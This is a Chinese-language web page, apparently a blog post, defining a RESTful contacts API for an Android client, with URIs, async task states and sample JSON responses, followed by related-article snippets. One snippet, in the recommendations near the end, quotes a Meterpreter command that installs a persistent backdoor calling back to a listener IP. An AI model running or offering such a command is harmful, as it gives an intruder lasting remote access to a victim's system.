RESTful Android API 定义

约定

  • 回复中默认包含标头:
    Content-Type: application/json;charset=UTF-8

  • 异步操作以(*)号标记

  • 大多数异步操作同时只能有一个任务在进行,以上传联系人为例:

    1. 客户端每次提交 POST /persons/uploader服务器放弃进行中的上传任务而新建;

    2. 客户端可以先访问GET /persons/uploader 获得当前是否有正在上传的任务;

    3. 服务器遇到错误的时候会将任务挂起,返回错误原因,客户端可以选择重试或者终止;

    4. 客户端接收到任务失败的响应后,如果响应中不包括retry的链接,则不应该重试;

  • 授权失败将返回403 Forbidden,客户端应该提示用户进行授权,同时进行重试。

联系人

URI 定义

接口 HTTP method URI
获取所有联系人 GET /persons?pagesize={pagesize}&start={start}
删除所有联系人* POST /persons/purge
上传联系人* POST /persons/uploader
获取联系人信息 GET /persons/{id}
新建联系人 POST /persons
编辑联系人 PUT /persons/{id}
删除联系人 DELETE /persons/{id}

示例

获取所有联系人

GET /persons?pagesize=10&start=0

  1. 200 OK
  2. {
  3. total: 100,
  4. links:
  5. [
  6. {rel: "self", href: "/persons?pagesize=10&start=10"},
  7. {rel: "pre", href: "/persons?pagesize=10&start=0"},
  8. {rel: "next", href: "/persons?pagesize=10&start=20"}
  9. ],
  10. persons:
  11. [
  12. {
  13. link: {rel: "self", href: "/person/1"}, id: "1", name: "Jack"//...
  14. },
  15. {
  16. link: {rel: "self", href: "/person/2"}, id: "2", name: "Lucy"//...
  17. }
  18. ]
  19. }

删除所有联系人*

GET /persons/purge

  1. 200 OK
  2. {
  3. link: {rel: "self", href="/persons/purge/0"} //一般不关心上次任务的状态,所以表述中没有捎带其状态
  4. }

不使用DELETE /persons, /persons资源仍然可以访问

POST /persons/purge

  1. 202 Accpeted
  2. {
  3. link: {rel: "self", href="/persons/purge/0"}
  4. }

GET /persons/purge/0

进行中

  1. 200 OK
  2. {
  3. link: {rel: "self", href="/persons/purge/0"},
  4. state: "pending",
  5. percent: "30"
  6. }

成功

  1. 303 See Other
  2. Location: "/persons"
  3. {
  4. link: {rel: "self", href="/persons/purge/0"},
  5. state: "done"
  6. }

失败

  1. 200 OK
  2. {
  3. links:
  4. [
  5. {rel: "self", href="/persons/purge/0"},
  6. {rel: "retry", href="/persons/purge/0"}
  7. ]
  8. state: "failed",
  9. reason: "XXX",
  10. }

重试

PUT /persons/purge/0

  1. 200 OK

终止

DELETE /persons/purge/0

  1. 200 OK

上传联系人*

GET /persons/uploader

  1. 200 OK
  2. {
  3. link: {rel: "self", href="/persons/uploader/0"}}
  4. }

POST /persons/uploader

[
{name: "Jack"},
{name: "Lucy"},
{name: "Lily"}
]

  1. 202 Accepted
  2. {
  3. link: {rel: "self", href="/persons/uploader/0"}}
  4. }

GET /persons/uploader

进行中

  1. 200 OK
  2. {
  3. link: {rel: "self", href="/persons/uploader/0"},
  4. state: "pending",
  5. percent: "30"
  6. }

成功

  1. 303 See Other
  2. Location: "/persons"
  3. {
  4. link: {rel: "self", href="/persons/uploader/0"},
  5. state: "done"
  6. }

失败

  1. 200 OK
  2. {
  3. links:
  4. [
  5. {rel: "self", href="/persons/uploader/0"},
  6. {rel: "retry", href="/persons/uploader/0"}
  7. ]
  8. state: "failed",
  9. reason: "XXX"
  10. }

重试

PUT /persons/uploader/0

  1. 200 OK

终止

DELETE /persons/uploader/0

  1. 200 OK

获取联系人信息

GET /person/1

  1. 200 OK
  2. {
  3. link: {rel: "self", href: "/person/1"}, id: "1", name: "Jack"//...
  4. }

新建联系人

POST /persons

{
name: "Jack"//...
}

  1. 201 Created
  2. {
  3. link: {rel: "self", href: "/person/1"}, id: "1", name: "Jack"//...
  4. }

编辑联系人

PUT /person/1

{
name: "Jack"//...
}

  1. 200 OK
  2. {
  3. link: {rel: "self", href: "/person/1"}, id: "1", name: "Jack"//...
  4. }

删除联系人

DELETE /person/1

  1. 200
  2. {
  3. name: "Jack"//...
  4. }

参考

HTTP Method Definitions

RESTful Android的更多相关文章

  1. Android教程收集贴

    Loader & REST Rest Loader Tutorial [github源码] [源码演示] [github作者主页] Twitter Timeline Sample for An ...

  2. 用Jersey为Android客户端开发Restful Web Service

    平时在做Android客户端的时候经常要与服务器之间通信,客户端通过服务端提供的接口获取数据,然后再展示在客户端的界面上,作为Android开发者,我们平时更多的是关注客户端的开发,而对服务端开发的关 ...

  3. SSM整合 完美支持RESTful(Jsp和客户端<android ios...>)

    一 RESTful简介 RESTful是一种网络应用程序的设计风格和开发方式 它结构清晰 符合标准 易于理解 扩展方便 REST 即Representational State Transfer的缩写 ...

  4. Android,适合Restful网络请求封装

    借助volley.Gson类库. 优点 网络请求集中处理,返回值直接为预期的对象,不需要手动反序列,提高效率,使用时建立好model类即可. 使用效果 DataProess.Request(true, ...

  5. 2015最流行的Android组件、工具、框架大全

    Android 是目前最流行的移动操作系统之一. 随着新版本的不断发布, Android的功能也日益强大, 涌现了很多流行的应用程序, 也催生了一大批的优秀的组件. 本文试图将目前流行的组件收集起来以 ...

  6. [转] Android优秀开源项目

    Android经典的开源项目其实非常多,但是国内的博客总是拿着N年前的一篇复制来复制去,实在是不利于新手学习.今天爬爬把自己熟悉的一些开源项目整理起来,希望能对Android开发同学们有所帮助.另外, ...

  7. Android开发笔记之《远程控制(MQTT|mosquitto) && (ProtocalBuffer | GRPC)》

    Android推送方案分析(MQTT/XMPP/GCM): http://www.open-open.com/lib/view/open1410848945601.htmlMQTT官网: http:/ ...

  8. Android高手速成--第二部分 工具库

    主要包括那些不错的开发库,包括依赖注入框架.图片缓存.网络相关.数据库ORM建模.Android公共库.Android 高版本向低版本兼容.多媒体相关及其他. 一.依赖注入DI 通过依赖注入减少Vie ...

  9. Android 多媒体视频播放一( 多媒体理解与经验分享)

    前言 说到android的多媒体,一把辛酸一把泪,当初听说会多媒体的比较牛掰,公司也有需求,于是乎我也积极的加入研究android多媒体的行列,记得以前刚接触的时候,最开始还是比较头大的,主要是但是很 ...

随机推荐

  1. Java的反射和代理以及注解

    最近接触到java的反射和代理(接触的有点迟了...),还是有必要总结下 1. Java的反射 有的时候我们需要在程序运行的时候获取类.方法等信息用于动态运行,这个时候反射就能够帮我们找到类.方法.成 ...

  2. SVN客户端的安装和使用

    ----------------------siwuxie095 SVN 客户端的安装 1.SVN 客户端,选择 TortoiseSVN,下载链接: https://tortoisesvn.net/d ...

  3. node.js压缩版 Windows安装

    1.下载 下载地址:https://nodejs.org/zh-cn/download/ 选择相应的版本下载 2.解压缩 将文件解压到要安装的位置,并新建两个目录 node-global :npm全局 ...

  4. meterpreter 如何留后门,使攻击持久化

    安装后门方法一:meterpreter >run persistence -X -i 5 -p 443 -r 192.168.0.108 Persistent agent script is 6 ...

  5. Linux readelf命令

    一.简介 readelf用来显示一个或者多个elf格式的目标文件的信息,可以通过它的选项来控制显示哪些信息.这里的elf-file(s)就表示那些被检查的文件.可以支持32位,64位的elf格式文件, ...

  6. DNA甲基化检测服务

    DNA甲基化检测服务 DNA甲基化是最早发现的基因表观修饰方式之一,真核生物中的甲基化仅发生于胞嘧啶,即在DNA甲基化转移酶(DNMTs)的作用下使CpG二核苷酸5'-端的胞嘧啶转变为5'-甲基胞嘧啶 ...

  7. python的metaclass浅析-乾颐堂

    元类一般用于创建类.在执行类定义时,解释器必须要知道这个类的正确的元类.解释器会先寻找类属性__metaclass__,如果此属性存在,就将这个属性赋值给此类作为它的元类.如果此属性没有定义,它会向上 ...

  8. dedecms连表查询参照

    ixingmeib2c/ds/entity_clas/tc_coupon_index.ls.php下面的getIndexInfo()方法

  9. [SoapUI] 设置HTTP Request的Header

    import com.eviware.soapui.support.types.StringToStringMap def hearderMap = new StringToStringMap() d ...

  10. Jmeter 如何让变量中包含变量

    在运行Jmeter的过程中,有时候,我们可能会引用一个变量,而这个变量又是由另外一个变量组成的: 譬如我在脚本中要引用变量MappingData1,按照正常的情况,直接就是用${MappingData ...